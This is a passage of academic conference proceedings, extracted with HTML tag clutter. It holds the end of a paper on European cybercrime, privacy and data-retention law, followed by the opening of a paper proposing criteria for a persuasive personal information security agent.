threaten<strong>in</strong>g character on network sites.<br />
Illegal content consists not only of racist or pornographic material, but also i.a. <strong>in</strong>structions how to build a<br />
bomb, real or logical, methods to create computer viruses, how to bypass security devices for computer<br />
programmes and systems and distribution of programmes without respect of copyright laws. Dissem<strong>in</strong>ation<br />
of <strong>in</strong>formation <strong>in</strong>tended to underm<strong>in</strong>e the confidence of concrete persons or <strong>in</strong>stitutions is also part of<br />
<strong>in</strong>formation warfare.<br />
3.1.1 Accountability framework of service adm<strong>in</strong>istrators<br />
A matter of <strong>in</strong>creas<strong>in</strong>g urgency is the necessity to def<strong>in</strong>e legal accountability of service adm<strong>in</strong>istrators for<br />
content made public <strong>in</strong> global networks.<br />
With<strong>in</strong> the framework of the European Union, the liability on behalf of service adm<strong>in</strong>istrators is def<strong>in</strong>ed <strong>in</strong><br />
Directive 2000/31/EC of the European Parliament and of the Council of 8 June 2000 on certa<strong>in</strong> legal aspects<br />
of <strong>in</strong>formation society services, <strong>in</strong> particular electronic commerce, <strong>in</strong> the Internal Market (Directive<br />
on electronic commerce, OJ L 178, 17.7.2000, p.1–16).<br />
Although the directive concerns primarily with the question of trade, a service provider, def<strong>in</strong>ed as any<br />
natural or legal person provid<strong>in</strong>g an <strong>in</strong>formation society service (i.e. any service normally provided for<br />
remuneration, at a distance by electronic means and at <strong>in</strong>dividual request of a recipient of services), <strong>in</strong><br />
many cases is the provider of network services.<br />
The service provider, accord<strong>in</strong>g to the directive, is not liable for the transmission of data provided by a<br />
recipient of the service, or the provision of access to a communication network, if he does not <strong>in</strong>itiate the<br />
transmission, select the receiver of the transmission and select or modify the <strong>in</strong>formation conta<strong>in</strong>ed <strong>in</strong> the<br />
transmission. Transmission is denoted by the directive as <strong>in</strong>termediate and transient storage of <strong>in</strong>formation<br />
transmitted for the sole purpose of carry<strong>in</strong>g out the transmission <strong>in</strong> communication network.<br />
The service provider is also not liable for automatic, <strong>in</strong>termediate and temporary storage of <strong>in</strong>formation<br />
transmitted or provided by a recipient of the service, if he does not modify the <strong>in</strong>formation and complies<br />
with the conditions concern<strong>in</strong>g access to <strong>in</strong>formation and its updat<strong>in</strong>g and not <strong>in</strong>terferes with any lawful<br />
use of technology.<br />
The provider has nevertheless the duty to act expeditiously to remove or to disable access to stored <strong>in</strong>formation<br />
if and when he obta<strong>in</strong>s knowledge of the fact that the <strong>in</strong>formation at the <strong>in</strong>itial source of the<br />
transmission has been removed from the network, or access to it has been disabled, or that a court or an<br />
adm<strong>in</strong>istrative authority has ordered such removal or disablement.<br />
The service provider is also not liable for the storage of <strong>in</strong>formation provided by a recipient of the service<br />
if he has no actual knowledge of any illegal activity or is not aware of facts or circumstances from which<br />
the illegal activity or <strong>in</strong>formation is apparent and upon obta<strong>in</strong><strong>in</strong>g such knowledge or awareness, acts expeditiously<br />
to remove or to disable access to the <strong>in</strong>formation.<br />
Many European countries have made an effort to regulate the accountability of computer network operators,<br />
particularly when it comes to Internet access.<br />
In F<strong>in</strong>land, providers of communication services, <strong>in</strong>clud<strong>in</strong>g providers of Internet services and computer<br />
network adm<strong>in</strong>istrators, are obliged to control the content of their networks. They are liable for any crim<strong>in</strong>al<br />
offence if the publication of certa<strong>in</strong> content is depended on their decision. They can be made accountable<br />
even if the network publication is not depended on their decision, if they fail to make any efforts<br />
to elim<strong>in</strong>ate the illegal content.<br />
The Swedish Lag om ansvar för elektroniska anslagstavlor (SFS 1998:112 with amendments) makes the<br />
service provider responsible for <strong>in</strong>formation regarded as obviously illegal (i.a. of racist or pornographic<br />
character or <strong>in</strong> cases of violation of copyright laws) and found <strong>in</strong> networks for which the service provider<br />
is adm<strong>in</strong>istratively responsible. This disregard<strong>in</strong>g if the provider was responsible for its <strong>in</strong>troduc<strong>in</strong>g <strong>in</strong> the<br />
network. The Swedish law requires that the adm<strong>in</strong>istrator supervises the flow of <strong>in</strong>formation <strong>in</strong> the network.<br />
The frequency of control to be carried out depends on the content of the service. Commercial services<br />
should be controlled more often than private ones. If law <strong>in</strong>fr<strong>in</strong>gements are common, the adm<strong>in</strong>is-<br />
239
Małgorzata Skórzewska-Amberg<br />
trator is obliged to ma<strong>in</strong>ta<strong>in</strong> regular control and elim<strong>in</strong>ate illegal content; if such <strong>in</strong>fr<strong>in</strong>gements are rare, it<br />
is sufficient to caution the users.<br />
3.1.2 Anonymity <strong>in</strong> networks<br />
The general problem of accountability for the content <strong>in</strong> the Internet will <strong>in</strong>crease. The anonymity, which<br />
until recently was the strength of networks, can soon be one of the major threats aga<strong>in</strong>st the legal framework<br />
which def<strong>in</strong>es our societies. Applications for creat<strong>in</strong>g anonymity <strong>in</strong> Internet transactions are more<br />
and more common.<br />
More countries <strong>in</strong>troduce new legal <strong>in</strong>struments to prevent law violation, facilitated or even made possible<br />
by the Internet. It seems therefore unavoidable to escape solutions restrict<strong>in</strong>g the anonymity of network<br />
users. However, it is important to stress that this is not about disclosure of identity towards other users,<br />
but only to enable access to a concrete person <strong>in</strong> case of law violation.<br />
Terrorism threats is also the reason why efforts are <strong>in</strong>tensified to <strong>in</strong>troduce measures allow<strong>in</strong>g certa<strong>in</strong><br />
degree of control over the virtual space.<br />
The problem of anonymity is nonetheless extraord<strong>in</strong>arily difficult. Its solution certa<strong>in</strong>ly requires a ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g<br />
of balance between demands of security for citizens and guarantees of their rights.<br />
3.1.3 Information <strong>in</strong>tegrity protected <strong>in</strong>terest<br />
Apply<strong>in</strong>g digital technology to secure <strong>in</strong>formation when generat<strong>in</strong>g, stor<strong>in</strong>g and transmitt<strong>in</strong>g requires close<br />
and consistent cooperation between all users of a particular network. Technical solutions <strong>in</strong> <strong>in</strong>formation<br />
security demands that rules of relevant procedures are strictly followed and supported by legal state obligations<br />
and sanctions <strong>in</strong> case of violation.<br />
The duty to penalize <strong>in</strong>tentional and unauthorized access to computer system results from <strong>in</strong>ternational<br />
prescriptions (i.a. Council of Europe Convention on Cybercrime, ETS No. 185 or Council Framework<br />
Decision 2005/222/JHA of 24 February 2005 on attacks aga<strong>in</strong>st <strong>in</strong>formation systems, OJ L 69,<br />
16.3.2005, p.67–71), as well as national legislation <strong>in</strong> many countries.<br />
Activities aim<strong>in</strong>g at ga<strong>in</strong><strong>in</strong>g access to computer systems by break<strong>in</strong>g or cunn<strong>in</strong>gly bypass<strong>in</strong>g security<br />
devices, access<strong>in</strong>g passwords or exploit<strong>in</strong>g security gaps, disregard<strong>in</strong>g if the object is a s<strong>in</strong>gle computer<br />
or a network, are penalized <strong>in</strong> a number of European laws.<br />
British Computer Misuse Act 1990 recognizes unauthorised access to computer material as an offence.<br />
French penal code (art. 323-1), on the other hand, recognizes as an offence fraudulently access<strong>in</strong>g or<br />
rema<strong>in</strong><strong>in</strong>g with<strong>in</strong> all or part of an automated data process<strong>in</strong>g system, while German penal code <strong>in</strong> art.<br />
202a does not limit the offender's activity – <strong>in</strong> purpose of obta<strong>in</strong><strong>in</strong>g data especially protected aga<strong>in</strong>st unauthorised<br />
access – to collateral data break<strong>in</strong>g.<br />
F<strong>in</strong>nish penal code <strong>in</strong> chapter 38, section 8 provides liability for unlawful access to a computer system<br />
us<strong>in</strong>g an unauthorised access code or by otherwise break<strong>in</strong>g a system protection. Similar solutions are to<br />
be found <strong>in</strong> Swedish penal code.<br />
Polish legislation protects access to <strong>in</strong>formation aga<strong>in</strong>st its unauthorized obta<strong>in</strong><strong>in</strong>g, penaliz<strong>in</strong>g violation of<br />
<strong>in</strong>tegrity of <strong>in</strong>formation systems, plac<strong>in</strong>g it on the same level as open<strong>in</strong>g a closed document, connect<strong>in</strong>g<br />
to telecommunication networks, break<strong>in</strong>g or by-pass<strong>in</strong>g electronic, magnetic or other particularly protected<br />
<strong>in</strong>formation, as well as <strong>in</strong>stall<strong>in</strong>g or utiliz<strong>in</strong>g <strong>in</strong>terception devices, visual or other equipment or programmes<br />
(art. 267 kk).<br />
Violation of <strong>in</strong>formation <strong>in</strong>tegrity consists not only of ga<strong>in</strong><strong>in</strong>g access to the <strong>in</strong>formation by an unauthorized<br />
person, but also prevent<strong>in</strong>g, or mak<strong>in</strong>g it difficult, for an authorized person to ga<strong>in</strong> access to the <strong>in</strong>formation<br />
<strong>in</strong> question (art. 268 § 1 kk, 268a, 303a StGB; British Computer Misuse Act 1990).<br />
Another severe action is disturb<strong>in</strong>g of the function<strong>in</strong>g of a computer or computer system through unauthorized<br />
violation of its <strong>in</strong>tegrity or by transmission of <strong>in</strong>formation data (269a kk; art. 323-1, 323-2, 323-3<br />
C.P.). An example of such acts is the <strong>in</strong>troduction of viruses <strong>in</strong>to a system, aim<strong>in</strong>g at not so much de-<br />
240
Małgorzata Skórzewska-Amberg<br />
stroy<strong>in</strong>g data, but to great extent slow<strong>in</strong>g down the computer. Another example is the transmission <strong>in</strong>to a<br />
network a request of echo to the address, consequently paralyz<strong>in</strong>g the network.<br />
Particular legal protection should be guaranteed <strong>in</strong> connection to data of substantial importance for public<br />
adm<strong>in</strong>istration and economy. <strong>Security</strong> violation of such <strong>in</strong>formation, often called computer sabotage, is<br />
therefore penalized through separate provisions (np. 269 kk, art. 303b StGB, art. 411-9 C.P.).<br />
Violation of <strong>in</strong>formation <strong>in</strong>tegrity is often connected with violation of state or official secrets. Penal codes<br />
protect such <strong>in</strong>formation (i.a.: art. 265-266 kk; art. 95-97b, 203, 204, 353b, 355 StGB; art. 226-13, 413-9,<br />
413-10 , 413-11 C.P.; British Official Secrets Act 1989), perceiv<strong>in</strong>g access<strong>in</strong>g to state secret as its disclosure.<br />
4. Information security and the right to privacy<br />
Protection of digital <strong>in</strong>formation covers not only protection of <strong>in</strong>formation stored <strong>in</strong> computer systems, but<br />
also <strong>in</strong>formation <strong>in</strong> transmission. Protection of the right to communicate <strong>in</strong> confidence is closely l<strong>in</strong>ked to<br />
the right of privacy.<br />
Such issues are regulated i.a. <strong>in</strong> the Directive 2002/58/EC of the European Parliament and of the Council<br />
of 12 July 2002 concern<strong>in</strong>g the process<strong>in</strong>g of personal data and the protection of privacy <strong>in</strong> electronic<br />
communication sectors (Directive on privacy and electronic communications, OJ L 201, 31.7.2002, p.37–<br />
47), aim<strong>in</strong>g at harmoniz<strong>in</strong>g the provisions valid <strong>in</strong> Member States. The objective is to ensure equal level<br />
of protection of fundamental rights and freedoms, <strong>in</strong> particular right to privacy, with respect to process<strong>in</strong>g<br />
of personal data <strong>in</strong> electronic communication sectors and to ensure free movement of such data, electronic<br />
communication equipment and services <strong>in</strong> the Community.<br />
The directive def<strong>in</strong>es user as any natural or legal person us<strong>in</strong>g a publicly available electronic communications<br />
service, for private or bus<strong>in</strong>ess purposes. Communication means any <strong>in</strong>formation exchanged or<br />
conveyed between a f<strong>in</strong>ite number of parties by means of publicly available electronic communication<br />
services. A call is def<strong>in</strong>ed by the directive as a connection established by means of a publicly available<br />
telephone service allow<strong>in</strong>g two-way communication <strong>in</strong> real time.<br />
Public communication network and electronic communications service are def<strong>in</strong>ed by art. 2 (d) and (c) of<br />
the Directive 2002/21/EC of the European Parliament and of the Council of 7 March 2002 on a common<br />
regulatory framework for electronic communications networks and services (Framework Directive, OJ L<br />
108, 24.4.2002, p.33–50). Public communications network is understood as an electronic communications<br />
network – i.e. transmission system and other resources which permit the conveyance of signals by<br />
wire, radio, optical or other electromagnetic means – used wholly or ma<strong>in</strong>ly for the provision of publicly<br />
available electronic communications services. Electronic communications service means a service normally<br />
provided for remuneration which consists wholly or ma<strong>in</strong>ly <strong>in</strong> the conveyance of signals <strong>in</strong> electronic<br />
communications networks, but exclude services provid<strong>in</strong>g, or exercis<strong>in</strong>g editorial control over content<br />
transmitted us<strong>in</strong>g electronic communications networks and services. This def<strong>in</strong>ition does not <strong>in</strong>clude <strong>in</strong>formation<br />
society services, as def<strong>in</strong>ed <strong>in</strong> Article 1 of Directive 98/34/EC, which do not consist wholly or<br />
ma<strong>in</strong>ly <strong>in</strong> the conveyance of signals <strong>in</strong> electronic communications networks.<br />
Furthermore, the directive on privacy and electronic communications <strong>in</strong>troduces a def<strong>in</strong>ition of electronic<br />
mail, describ<strong>in</strong>g it as text, voice, sound or image message sent over a public communications network<br />
which can be stored <strong>in</strong> the network or <strong>in</strong> the recipient's term<strong>in</strong>al equipment until it is collected by the recipient.<br />
Member States are obliged by the directive to <strong>in</strong>troduce such provisions <strong>in</strong> national legislation which can<br />
ensure the confidentiality of communication and publicly available electronic communication services. In<br />
particular listen<strong>in</strong>g, tapp<strong>in</strong>g, stor<strong>in</strong>g or other k<strong>in</strong>d of <strong>in</strong>terception or surveillance of communications - without<br />
the consent of the users concerned - should <strong>in</strong> pr<strong>in</strong>ciple be forbidden. The necessity to secure <strong>in</strong>formation<br />
transmission aga<strong>in</strong>st unauthorized access is the subject of penal code rules and procedures.<br />
Property law penalizes access to <strong>in</strong>formation <strong>in</strong> transmission (<strong>in</strong>clud<strong>in</strong>g violation of correspondence secret<br />
and the use of <strong>in</strong>terception), carried out without authorization (i.a.: art. 267 kk; art. 201-202b, 206<br />
StGB, art. 85, 87 of the Telekommunikationsgesetz (TKG) vom 25.Juli 1996 (BGBl. I, S. 1120) with later<br />
amendments; art. 226-1, 226-2, 226-3, 226-15, 432-9 C.P.; British Regulation of Investigatory Powers Act<br />
2000).<br />
241
Małgorzata Skórzewska-Amberg<br />
Restrict<strong>in</strong>g any k<strong>in</strong>d of privacy, <strong>in</strong>clud<strong>in</strong>g the right to communicate is, at the same time, permitted <strong>in</strong> certa<strong>in</strong><br />
cases. Art. 15 par. 1 of the directive on privacy and electronic communications constitutes that Member<br />
States may adopt legislative measures to restrict the scope of the right to privacy, if it is necessary,<br />
appropriate and proportionate with<strong>in</strong> a democratic society to safeguard national security, defence, public<br />
security, and the prevention, <strong>in</strong>vestigation, detection and prosecution of crim<strong>in</strong>al offences or of unauthorised<br />
use of electronic communication systems. A similar sanction is <strong>in</strong>troduced by the Convention on<br />
Cybercrime provisions of procedural law (art. 14-21).<br />
Sanction <strong>in</strong> nation legislation to ga<strong>in</strong> access to the content of <strong>in</strong>formation <strong>in</strong> transmission is most often to<br />
be found <strong>in</strong> formal legislation and curtailed with a number of conditions. Among the more important ones<br />
are: limit<strong>in</strong>g the possibility of ga<strong>in</strong><strong>in</strong>g access to <strong>in</strong>formation <strong>in</strong> transmission to cases where there is justified<br />
suspicion of violation of law; the necessity of permission from certified authorities (courts normally) to<br />
ga<strong>in</strong> access to <strong>in</strong>formation <strong>in</strong> transmission or supervision by certified authorities over the process (i.a.: <strong>in</strong><br />
German law art. 100a – 100d, 218 of the Crim<strong>in</strong>al Procedure Code, regulations concern<strong>in</strong>g extra-judicial<br />
surveillance, <strong>in</strong>cluded <strong>in</strong> particular regulations; provisions <strong>in</strong> the French Loi 91-646 du 10 Juillet 1991<br />
relative au secret des correspondances émises par la voie des telecommunications, Journal Officiel<br />
Numéro 162 du 13 Juillet 1991; British Regulation of Investigatory Powers Act 2000; art. 218, 218a, 230a<br />
236 237-242 Polish Crim<strong>in</strong>al Procedure Code, art. 159 § 2, 160, 161, 179, 180 ustawy z dnia 16 lipca<br />
2004 roku – Prawo telekomunikacyjne , Dz.U. Nr 171, poz. 1800 with amendments, as well as regulation<br />
concern<strong>in</strong>g extra-judicial surveillance, <strong>in</strong>cluded <strong>in</strong> particular regulations).<br />
4.1 Cryptography and legal access to <strong>in</strong>formation <strong>in</strong> transmission<br />
One of the most effective methods of secur<strong>in</strong>g digital <strong>in</strong>formation is conceal<strong>in</strong>g it with the use of cryptography.<br />
Problems emerge when authorities certified to ga<strong>in</strong> access to <strong>in</strong>formation <strong>in</strong> transmission encounter encrypted<br />
<strong>in</strong>formation. Modern cryptographic technology enables conceil<strong>in</strong>g <strong>in</strong>formation to a very high degree<br />
of efficiency. The only method of ga<strong>in</strong><strong>in</strong>g access to the content is often an unprofitably brutal attack.<br />
Law-makers try therefore to protect state <strong>in</strong>terest when access to <strong>in</strong>formation <strong>in</strong> transmission is authorized.Regulations<br />
concern<strong>in</strong>g authorized <strong>in</strong>terception often impose on entities responsible for the transmission<br />
to provide cryptographic support (e.g.: British Regulation of Investigatory Powers Act 2000; art.<br />
11-1 of the Loi 91-646 du 10 Juillet 1991 relative au secret des correspondances émises par la voie des<br />
telecommunications, Journal Officiel Numéro 162 du 13 Juillet 1991; <strong>in</strong> Poland § 7 and 8 rozporządzenia<br />
M<strong>in</strong>istra Sprawiedliwości z dnia 24 czerwca 2003 roku w sprawie sposobu technicznego przygotowania<br />
sieci służących do przekazywania <strong>in</strong>formacji, do kontroli przekazów <strong>in</strong>formacji oraz sposobu dokonywania,<br />
rejestracji, przechowywania, odtwarzania i niszczenia zapisów z kontrolowanych przekazów,,,<br />
Dz.U. Nr 110, poz. 1052; art. 19 of the Swedish Lag (2003:389) om elektronisk kommunikation).<br />
4.2 Retention of data as <strong>in</strong>strument to secure <strong>in</strong>formation<br />
The directive 2006/24/EC of the European Parliament and of the Council of 15 March 2006 on the retention<br />
of data generated or processed <strong>in</strong> connection with the provision of publicly available electronic communications<br />
services or of public communications networks and amend<strong>in</strong>g Directive 2002/58/EC (OJ L<br />
105, 13.4.2006, p.54–63) is to be seen as an <strong>in</strong>strument <strong>in</strong> combat<strong>in</strong>g modern crime, <strong>in</strong>clud<strong>in</strong>g computer<br />
crime.<br />
The directive obliges providers of publicly available electronic communication services to reta<strong>in</strong> data concern<strong>in</strong>g<br />
connections made by fixed networks, mobile and Internet telephony, as well as Internet access<br />
and Internet electronic mail, <strong>in</strong>clud<strong>in</strong>g <strong>in</strong>formation concern<strong>in</strong>g source and dest<strong>in</strong>ation of a communication,<br />
location, date, time, duration and type of a communication (no data reveal<strong>in</strong>g the content of the communication<br />
may be reta<strong>in</strong>ed).<br />
User is def<strong>in</strong>ed as any legal or natural person us<strong>in</strong>g any publicly available electronic communication service,<br />
<strong>in</strong>clud<strong>in</strong>g a person who has not subscribed to such service (art. 2 par. 2 sub-paragraph b). Although<br />
the <strong>in</strong>tention of the directive was to make possible to establish the identity of the user, regardless of his or<br />
her status as subscriber or user, a dist<strong>in</strong>ction was made between user and registered subscriber (without<br />
a precise def<strong>in</strong>ition of registered subscriber), leav<strong>in</strong>g pre-paid service users out of the range of the directive.<br />
242
Małgorzata Skórzewska-Amberg<br />
Even if article 5 par. 1 sub-paragraph e.2.vi stipulates retention and stor<strong>in</strong>g of activation date and time of<br />
anonymous pre-paid service, as well as the location label from which the service was activated, such<br />
data is of little use <strong>in</strong> prosecut<strong>in</strong>g for example cybercrime committed <strong>in</strong> cyberspace, accessed by an<br />
anonymous service (for example data transmission carried out by a pre-paid mobile phone). Some European<br />
countries (outside Europe, for example <strong>in</strong> the USA a bill is already drafted requir<strong>in</strong>g registration of<br />
telephone card users) i.a. Germany, Italy, Greece, Slovakia and Switzerland (not an EU member), <strong>in</strong>troduced<br />
an obligation to register pre-paid SIM card buyers (understood as users), while other countries like<br />
Poland allows registration of telephone card users on a voluntary basis. Still other countries treat such<br />
users as completely anonymous.<br />
The legislative heterogeneity could from this po<strong>in</strong>t of view result <strong>in</strong> failure of the very basic <strong>in</strong>tentions of<br />
the legislator with regard to possibilities to establish the identity of a pre-paid card user. A person who<br />
wants to rema<strong>in</strong> anonymous can easily buy a card <strong>in</strong> a country where there is no obligation to register the<br />
buyer.<br />
5. Conclusions<br />
The technological revolution we are witness<strong>in</strong>g, has moved a substantial part of human activities <strong>in</strong>to the<br />
virtual sphere, mak<strong>in</strong>g modern societies <strong>in</strong> general not only strongly depended on ICT systems, but <strong>in</strong>creas<strong>in</strong>gly<br />
vulnerable.<br />
Crim<strong>in</strong>al acts, committed <strong>in</strong> networks, with the use of networks and aga<strong>in</strong>st networks, reach beyond national<br />
borders. Already <strong>in</strong> the 1990s, the United Nations (UN) recognized computer abuse as a form of<br />
transborder crime.<br />
At the beg<strong>in</strong>n<strong>in</strong>g of the 21 st century, profits orig<strong>in</strong>at<strong>in</strong>g <strong>in</strong> computer crime surpassed those from drug<br />
trade. Expert assessments <strong>in</strong>dicate that it is now equal to the global level of <strong>in</strong>come from illegal as well as<br />
legal trade <strong>in</strong> weapons (Mejssner, 2007).<br />
In the last few years, terrorist attacks has become <strong>in</strong>creas<strong>in</strong>gly common, aimed primarily at structures on<br />
which modern societies are built. The target of a terrorist attack could constitute a computer network or<br />
more preferably public, social or economic structures (for example banks, research <strong>in</strong>stitutions, nuclear<br />
plants etc), all function<strong>in</strong>g on the basis of such networks.<br />
In the com<strong>in</strong>g years it is expected that attacks on computer systems will be more common. The target of<br />
such attacks is expected to constitute of ma<strong>in</strong>ly bank<strong>in</strong>g <strong>in</strong>frastructure and other so called critical <strong>in</strong>frastructure.<br />
Recently three such known attacks were successfully carried out <strong>in</strong> Europe: 2007 <strong>in</strong> Estonia,<br />
2008 <strong>in</strong> Lithuania and Georgia.<br />
It is therefore of fundamental importance to ensure the security of computer networks and their users, not<br />
the least s<strong>in</strong>ce virtual space, as we have seen, is particularly attractive for digital warfare.<br />
Consider<strong>in</strong>g this rather gloomy background, how can we summarize the ma<strong>in</strong> legislative challenges to<br />
focus on?<br />
Above all, the language used by modern technology has to be transcribed <strong>in</strong>to proper legal language and<br />
the adaptation of new legislation must cover as much as possible of cyberspace behaviour. A challenge<br />
<strong>in</strong> this context is the fact that technology is develop<strong>in</strong>g at a much faster pace than legislative processes.<br />
Consequently, threats orig<strong>in</strong>at<strong>in</strong>g <strong>in</strong> widespread use of ICT systems evolve very fast, obstruct<strong>in</strong>g parallel<br />
processes of adaptation of new legislation.<br />
Furthermore, protection of digital <strong>in</strong>formation and fight aga<strong>in</strong>st so called computer crime cannot be pursued<br />
without close <strong>in</strong>ternational cooperation and global jo<strong>in</strong>t actions.<br />
EU law as well as national legislation <strong>in</strong> <strong>in</strong>dividual Member States seems <strong>in</strong> pr<strong>in</strong>ciple to be sufficiently<br />
harmonized. Nonetheless, there are still areas where adopted solutions need to be changed or adjusted.<br />
It is also necessary to stress that while law harmonization with<strong>in</strong> the EU is important, these efforts will<br />
have limited effect if further harmonization is not carried out on a global scale. Crimes committed <strong>in</strong> digital<br />
<strong>in</strong>formation networks, as we have seen, do not recognize any national borders.<br />
243
Małgorzata Skórzewska-Amberg<br />
It is also crucial that proper tra<strong>in</strong><strong>in</strong>g is offered to personnel, particularly <strong>in</strong> the judiciary and those <strong>in</strong>volved<br />
<strong>in</strong> detection, prosecut<strong>in</strong>g and punish<strong>in</strong>g violation of law <strong>in</strong> connection to computer use and ICT networks.<br />
Human resources occupied with modern technology crimes must have appropriate qualifications and<br />
access to necessary equipment.<br />
Noteworthy among the many detailed challenges is the question of accountability of service adm<strong>in</strong>istrators<br />
and more precisely the need to react swiftly <strong>in</strong> cases of violation of law <strong>in</strong> networks.<br />
The discussion on block<strong>in</strong>g and elim<strong>in</strong>at<strong>in</strong>g of Internet pages with illegal content is particularly animated.<br />
The discussion is not new. The questions raised concern<strong>in</strong>g lack of adequate efficiency of such procedures<br />
are of course legitimate. Nevertheless, it does not change the fact that block<strong>in</strong>g websites with illegal<br />
content is function<strong>in</strong>g <strong>in</strong> certa<strong>in</strong> EU countries (<strong>in</strong> some as a consequence of adopted legislation, <strong>in</strong><br />
others as a result of agreements between ISP). In a situation where a majority of websites with illegal<br />
content is located on servers beyond the jurisdiction of EU Member States, this solution seems for the<br />
time be<strong>in</strong>g to be the most feasible way out.<br />
User registration of pre-paid services needs also to be harmonized. Effective prosecution is hampered by<br />
the current fact that <strong>in</strong> some Member States such registration is compulsory, while <strong>in</strong> others this service<br />
rema<strong>in</strong>s totally anonymous.<br />
F<strong>in</strong>ally, another <strong>in</strong>creas<strong>in</strong>gly urgent issue to be raised is the need to regulate services which use cryptography<br />
and <strong>in</strong> particular the question of admitt<strong>in</strong>g decipher<strong>in</strong>g of transmission content <strong>in</strong> situation of legal<br />
<strong>in</strong>terception of encrypted <strong>in</strong>formation.<br />
The law, not for the first time <strong>in</strong> its long history of existence, has to undergo an adaptation to a chang<strong>in</strong>g<br />
environment, ma<strong>in</strong>ta<strong>in</strong><strong>in</strong>g at the same time an ability to forsee and forego situations as those provided by<br />
the ongo<strong>in</strong>g technological revolution.<br />
References<br />
Mejssner, B., 2007, Niezbite cyfrowe dowody [onl<strong>in</strong>e], http://cio.cxo.pl/artykuly/55536/Niezbite.cyfro-we.dowody.html<br />
244
Criteria for a Personal Information <strong>Security</strong> Agent<br />
Ewald Stieger and Rossouw von Solms<br />
Nelson Mandela Metropolitan University, Port Elizabeth, South Africa<br />
s20631237@nmmu.ac.za<br />
Rossouw.VonSolms@nmmu.ac.za<br />
Abstract: Today’s economy depends on the secure flow of <strong>in</strong>formation with<strong>in</strong> and across organizations and<br />
<strong>in</strong>formation security is an issue of vital importance. Information security ensures bus<strong>in</strong>ess cont<strong>in</strong>uity and m<strong>in</strong>imizes<br />
bus<strong>in</strong>ess damage by prevent<strong>in</strong>g and reduc<strong>in</strong>g the impact of security <strong>in</strong>cidents. However, <strong>in</strong>formation security efforts<br />
are certa<strong>in</strong>ly not as effective as one would have wished for. A commonly accepted reason for this is the <strong>in</strong>secure<br />
behaviour of people. This <strong>in</strong>secure behaviour is often due to a lack of knowledge, awareness, education and tra<strong>in</strong><strong>in</strong>g.<br />
In order to address this, many organisations provide security education, tra<strong>in</strong><strong>in</strong>g and awareness programs to their<br />
employees. However, these programs often do not achieve a persistent change towards secure behaviour. The<br />
various reasons that contribute to the failure of security education, tra<strong>in</strong><strong>in</strong>g and awareness programs and cause the<br />
trend towards <strong>in</strong>secure behaviour are briefly discussed. It follows that chang<strong>in</strong>g the behaviour of people is an<br />
<strong>in</strong>herently difficult task that requires the consideration of many factors. Similarly, a tool that <strong>in</strong>tends to address<br />
<strong>in</strong>secure behaviour needs to consider various technological elements that may contribute <strong>in</strong> its ability to <strong>in</strong>fluence<br />
behaviour. The aim of this paper is to propose the pr<strong>in</strong>ciples of a personal <strong>in</strong>formation security agent and explore a<br />
set of objectives and criteria that may contribute to its success <strong>in</strong> <strong>in</strong>fluenc<strong>in</strong>g and rem<strong>in</strong>d<strong>in</strong>g <strong>in</strong>dividuals towards a<br />
more secure behaviour. The criteria stem from various doma<strong>in</strong>s such as persuasive technology and human computer<br />
<strong>in</strong>teraction. Persuasive technology has been applied <strong>in</strong> various doma<strong>in</strong>s to shape, re<strong>in</strong>force or change people’s<br />
behaviour. We describe related work that has been done us<strong>in</strong>g persuasive technology, and build on it. The proposed<br />
criteria consists of functions such as “To motivate” and characteristics such as “Context sensitivity”. To put the theory<br />
<strong>in</strong>to practice, a prototype of a personal security agent has been developed that implements some of the criteria.<br />
Based on this, a discussion on the development and implementation of the prototype and its potential benefits has<br />
been <strong>in</strong>cluded. The prototype was developed to test the proposed criteria <strong>in</strong> a practical experiment that will form part<br />
of future research.<br />
Keywords: Information security, <strong>in</strong>formation security awareness, persuasive technology, human computer<br />
<strong>in</strong>teraction, human behaviour<br />
1. Introduction<br />
Information security rema<strong>in</strong>s to be a major problem, <strong>in</strong> particular the human issue. The famous hacker<br />
Kev<strong>in</strong> Mitnick (Poulsen 2000) testified before the [US] congress say<strong>in</strong>g that “... the human side of<br />
computer security is easily exploited and constantly overlooked. Companies spend millions of dollars on<br />
firewalls, encryption and secure access devices, and it’s money wasted, because none of these<br />
measures address the weakest l<strong>in</strong>k <strong>in</strong> the security cha<strong>in</strong>.”<br />
The Ponemon Institute (2009) surveyed 967 end-users of corporate <strong>in</strong>formation technologies and found<br />
that there is an <strong>in</strong>creas<strong>in</strong>g trend <strong>in</strong> <strong>in</strong>secure behaviour amongst participants. For example, between 2007<br />
and 2009 there was a 4% <strong>in</strong>crease <strong>in</strong> the switch<strong>in</strong>g off of security-related software such as anti-virus.<br />
Threats also exhibit a similar <strong>in</strong>creas<strong>in</strong>g trend. The Sophos security threat report (Sophos 2011)<br />
measured a 10% <strong>in</strong>crease <strong>in</strong> spam reports, a 13% <strong>in</strong>crease <strong>in</strong> phish<strong>in</strong>g and a 4% <strong>in</strong>crease <strong>in</strong> malware<br />
between December 2009 and December 2010. Organisations also face threats, such as data leakage,<br />
from <strong>in</strong>dividuals who are not employees. These “external <strong>in</strong>siders” are <strong>in</strong>troduced through trad<strong>in</strong>g<br />
partners or by outsourc<strong>in</strong>g bus<strong>in</strong>ess processes. Most organisations address this by add<strong>in</strong>g security<br />
clauses to their contracts and policies, but enforc<strong>in</strong>g them rema<strong>in</strong>s a difficult task. This is often due to the<br />
fast pace of bus<strong>in</strong>ess or a lack of resources (Johnson and Goetz 2007). Furthermore, policies tend to be<br />
ignored. In the survey done by the Ponemon Institute (2009) 57% of respondents agreed that data<br />
security policies are largely ignored by employees and management. It is therefore essential that users of<br />
<strong>in</strong>formation (end-users) are made aware of threats and the risks that can be associated with them. The<br />
traditional way of achiev<strong>in</strong>g this is through security education, tra<strong>in</strong><strong>in</strong>g and awareness (SETA) programs<br />
which are typically offered by organisations. However, these programs are often not as successful as<br />
envisaged. The follow<strong>in</strong>g reasons that contribute to this are:<br />
The programs are too generic and target too large an audience (Austen and Stewart 2008; Valent<strong>in</strong>e<br />
2006).<br />
Individuals attend<strong>in</strong>g the programs may believe the <strong>in</strong>formation given is not relevant to them<br />
(Valent<strong>in</strong>e 2006).<br />
Individuals forget the message that was given dur<strong>in</strong>g the program (Albrechtsen 2007).<br />
245
Ewald Stieger and Rossouw von Solms<br />
Computer users have conflict<strong>in</strong>g goals and relegate security to second place (Sasse, Brostoff and<br />
Weirich 2001; Whitten and Tygar 1999).<br />
Computer users believe that there is no personal danger and they are not the target (Beautement<br />
and Sasse 2009; Weirich and Sasse 2001; West 2008).<br />
Computer users believe that hackers will always f<strong>in</strong>d a way <strong>in</strong>, even if one is behav<strong>in</strong>g securely<br />
